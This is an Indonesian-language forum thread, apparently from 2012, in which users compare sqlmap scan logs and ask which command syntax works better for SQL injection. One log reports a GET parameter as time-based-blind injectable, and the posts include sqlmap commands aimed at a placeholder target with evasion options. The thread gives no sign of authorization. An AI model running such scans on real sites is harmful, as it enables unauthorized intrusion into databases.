03-12-2012, 04:48 PM
(03-11-2012, 07:41 PM)fake666 Wrote: lah kok gagal mulu ya ==
gak ad database yang ke inject
[01:19:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:20:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:20:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:20:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:20:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:20:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:21:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:21:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:22:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:24:19] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[01:24:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
cuman gitu aja ==
eh bukan itu
tapi ini
18:46:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:46:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[18:46:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[18:46:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:46:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:47:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:47:03] [INFO] testing 'Oracle AND time-based blind'
[18:47:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:47:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:47:39] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
syntaks nya apa aja??
seperti ini kah?
./sqlmap.py -u http://target.com/index.php?id=2
atau
./sqlmap.py -u http://target.com/index.php?id=2 --random-agent --threads 10 --banner
pakai yang mana??
ane sih pertama pake yang singkat,tapi keseringan gagal, g tau kenapa,,
terus lihat thread ny om syntax seperti cara yang kedua,,cukup enak ane ,dan sering berhasil ,,